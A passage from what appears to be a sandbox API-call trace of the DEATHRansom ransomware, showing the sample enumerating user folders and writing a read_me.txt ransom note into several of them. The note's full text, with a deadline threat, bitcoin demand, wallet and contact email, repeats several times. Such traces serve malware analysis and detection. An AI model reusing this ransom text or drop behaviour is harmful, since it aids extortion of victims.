FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.864] WriteFile (in: hFile=0x7d0, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e0e4, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e0e4*=0x6b3, lpOverlapped=0x0) returned 1 [0075.864] CloseHandle (hObject=0x7d0) returned 1 [0075.865] GetProcessHeap () returned 0x280000 [0075.865] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8db3140 | out: hHeap=0x280000) returned 1 [0075.865] lstrcpyW (in: lpString1=0x8db3140, lpString2="\\\\?\\C:\\Users\\Default\\Recent" | out: lpString1="\\\\?\\C:\\Users\\Default\\Recent") returned="\\\\?\\C:\\Users\\Default\\Recent" [0075.865] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 112 [0075.865] QueueUserWorkItem (Function=0x40a710, Context=0x8db3140, Flags=0x0) returned 1 [0075.865] GetProcessHeap () returned 0x280000 [0075.865] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8dc3148 [0075.866] wnsprintfW (in: pszDest=0x8dc3148, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Recent\\*") returned 29 [0075.866] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Recent\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x176a7cf0, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x176a7cf0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x176a7cf0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="read_me.txt", cAlternateFileName="廠疙ᣜ?\x17甴\x17a")) returned 0xffffffff [0075.866] wnsprintfW (in: pszDest=0x8dc3148, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Recent\\read_me.txt") returned 39 [0075.866] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Recent\\read_me.txt" (normalized: "c:\\users\\default\\recent\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7d0 [0075.920] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.920] WriteFile (in: hFile=0x7d0, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e0e4, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e0e4*=0x6b3, lpOverlapped=0x0) returned 1 [0075.921] CloseHandle (hObject=0x7d0) returned 1 [0075.921] GetProcessHeap () returned 0x280000 [0075.921] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8dc3148 | out: hHeap=0x280000) returned 1 [0075.921] lstrcpyW (in: lpString1=0x8dc3148, lpString2="\\\\?\\C:\\Users\\Default\\Saved Games" | out: lpString1="\\\\?\\C:\\Users\\Default\\Saved Games") returned="\\\\?\\C:\\Users\\Default\\Saved Games" [0075.921] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 113 [0075.921] QueueUserWorkItem (Function=0x40a710, Context=0x8dc3148, Flags=0x0) returned 1 [0075.921] GetProcessHeap () returned 0x280000 [0075.921] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8dd3150 [0075.922] wnsprintfW (in: pszDest=0x8dd3150, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Saved Games\\*") returned 34 [0075.922] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Saved Games\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd894d74c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b26f8 [0075.959] lstrcpyW (in: lpString1=0x8dd3150, lpString2="\\\\?\\C:\\Users\\Default\\Searches" | out: lpString1="\\\\?\\C:\\Users\\Default\\Searches") returned="\\\\?\\C:\\Users\\Default\\Searches" [0075.959] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 114 [0075.959] QueueUserWorkItem (Function=0x40a710, Context=0x8dd3150, Flags=0x0) returned 1 [0075.959] GetProcessHeap () returned 0x280000 [0075.959] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8de3158 [0075.960] wnsprintfW (in: pszDest=0x8de3158, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Searches\\*") returned 31 [0075.960] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88b51cb, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b26f8 [0076.009] lstrcpyW (in: lpString1=0x8de3158, lpString2="\\\\?\\C:\\Users\\Default\\SendTo" | out: lpString1="\\\\?\\C:\\Users\\Default\\SendTo") returned="\\\\?\\C:\\Users\\Default\\SendTo" [0076.009] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 115 [0076.009] QueueUserWorkItem (Function=0x40a710, Context=0x8de3158, Flags=0x0) returned 1 [0076.009] GetProcessHeap () returned 0x280000 [0076.009] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8df3160 [0076.010] wnsprintfW (in: pszDest=0x8df3160, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\SendTo\\*") returned 29 [0076.010] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\SendTo\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Indexed Locations.search-ms", cAlternateFileName="廠疙ᣜ?\x17甴\x17a")) returned 0xffffffff [0076.010] wnsprintfW (in: pszDest=0x8df3160, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\SendTo\\read_me.txt") returned 39 [0076.010] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\SendTo\\read_me.txt" (normalized: "c:\\users\\default\\sendto\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7d4 [0076.053] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0076.053] WriteFile (in: hFile=0x7d4, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e0e4, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e0e4*=0x6b3, lpOverlapped=0x0) returned 1 [0076.054] CloseHandle (hObject=0x7d4) returned 1 [0076.054] GetProcessHeap () returned 0x280000 [0076.054] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8df3160 | out: hHeap=0x280000) returned 1 [0076.054] lstrcpyW (in: lpString1=0x8df3160, lpString2="\\\\?\\C:\\Users\\Default\\Start Menu" | out: lpString1="\\\\?\\C:\\Users\\Default\\Start Menu") returned="\\\\?\\C:\\Users\\Default\\Start Menu" [0076.055] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 116 [0076.055] QueueUserWorkItem (Function=0x40a710, Context=0x8df3160, Flags=0x0) returned 1 [0076.055] GetProcessHeap () returned 0x280000 [0076.055] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8e03168 [0076.056] wnsprintfW (in: pszDest=0x8e03168, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Start Menu\\*") returned 33 [0076.056] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Start Menu\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Indexed Locations.search-ms", cAlternateFileName="\x07")) returned 0xffffffff [0076.056] wnsprintfW (in: pszDest=0x8e03168, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Start Menu\\read_me.txt") returned 43 [0076.056] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Start Menu\\read_me.txt" (normalized: "c:\\users\\default\\start menu\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7dc [0076.100] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0076.100] WriteFile (in: hFile=0x7dc, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e0e4, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e0e4*=0x6b3, lpOverlapped=0x0) returned 1 [0076.100] CloseHandle (hObject=0x7dc) returned 1 [0076.101] GetProcessHeap () returned 0x280000 [0076.101] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8e03168 | out: hHeap=0x280000) returned 1 [0076.101] lstrcpyW (in: lpString1=0x8e03168, lpString2="\\\\?\\C:\\Users\\Default\\Templates" | out: lpString1="\\\\?\\C:\\Users\\Default\\Templates") returned="\\\\?\\C:\\Users\\Default\\Templates" [0076.101] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 117 [0076.101] QueueUserWorkItem (Function=0x40a710, Context=0x8e03168, Flags=0x0) returned 1 [0076.101] GetProcessHeap () returned 0x280000 [0076.101] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8e13170 [0076.101] wnsprintfW (in: pszDest=0x8e13170, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Templates\\*") returned 32 [0076.101] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Templates\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Indexed Locations.search-ms", cAlternateFileName="\x07")) returned 0xffffffff [0076.102] wnsprintfW (in: pszDest=0x8e13170, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Templates\\read_me.txt") returned 42 [0076.102] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Templates\\read_me.txt" (normalized: "c:\\users\\default\\templates\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7dc [0076.102] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0076.102] WriteFile (in: hFile=0x7dc, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e0e4, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e0e4*=0x6b3, lpOverlapped=0x0) returned 1 [0076.103] CloseHandle (hObject=0x7dc) returned 1 [0076.103] GetProcessHeap () returned 0x280000 [0076.103] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8e13170 | out: hHeap=0x280000) returned 1 [0076.103] lstrcpyW (in: lpString1=0x8e13170, lpString2="\\\\?\\C:\\Users\\Default\\Videos" | out: lpString1="\\\\?\\C:\\Users\\Default\\Videos") returned="\\\\?\\C:\\Users\\Default\\Videos" [0076.103] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 118 [0076.103] QueueUserWorkItem (Function=0x40a710, Context=0x8e13170, Flags=0x0) returned 1 [0076.103] GetProcessHeap () returned 0x280000 [0076.103] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8e23178 [0076.104] wnsprintfW (in: pszDest=0x8e23178, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Videos\\*") returned 29 [0076.104] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Videos\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1771a110, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x1771a110, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b26f8 [0076.106] lstrcpyW (in: lpString1=0x8c53090, lpString2="\\\\?\\C:\\Users\\Default User" | out: lpString1="\\\\?\\C:\\Users\\Default User") returned="\\\\?\\C:\\Users\\Default User" [0076.106] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 119 [0076.106] QueueUserWorkItem (Function=0x40a710, Context=0x8c53090, Flags=0x0) returned 1 [0076.106] GetProcessHeap () returned 0x280000 [0076.106] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8e23178 [0076.106] wnsprintfW (in: pszDest=0x8e23178, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default User\\*") returned 27 [0076.106] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default User\\*", lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="videos", cAlternateFileName="\x07")) returned 0xffffffff [0076.106] wnsprintfW (in: pszDest=0x8e23178, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default User\\read_me.txt") returned 37 [0076.106] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default User\\read_me.txt" (normalized: "c:\\users\\default user\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0076.106] GetProcessHeap () returned 0x280000 [0076.106] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8e23178 | out: hHeap=0x280000) returned 1 [0076.106] lstrcpyW (in: lpString1=0x8e23178, lpString2="\\\\?\\C:\\Users\\Public" | out: lpString1="\\\\?\\C:\\Users\\Public") returned="\\\\?\\C:\\Users\\Public" [0076.106] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 120 [0076.106] QueueUserWorkItem (Function=0x40a710, Context=0x8e23178, Flags=0x0) returned 1 [0076.106] GetProcessHeap () returned 0x280000 [0076.106] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8e33180 [0076.107] wnsprintfW (in: pszDest=0x8e33180, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\*") returned 21 [0076.107] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\*", lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x11, 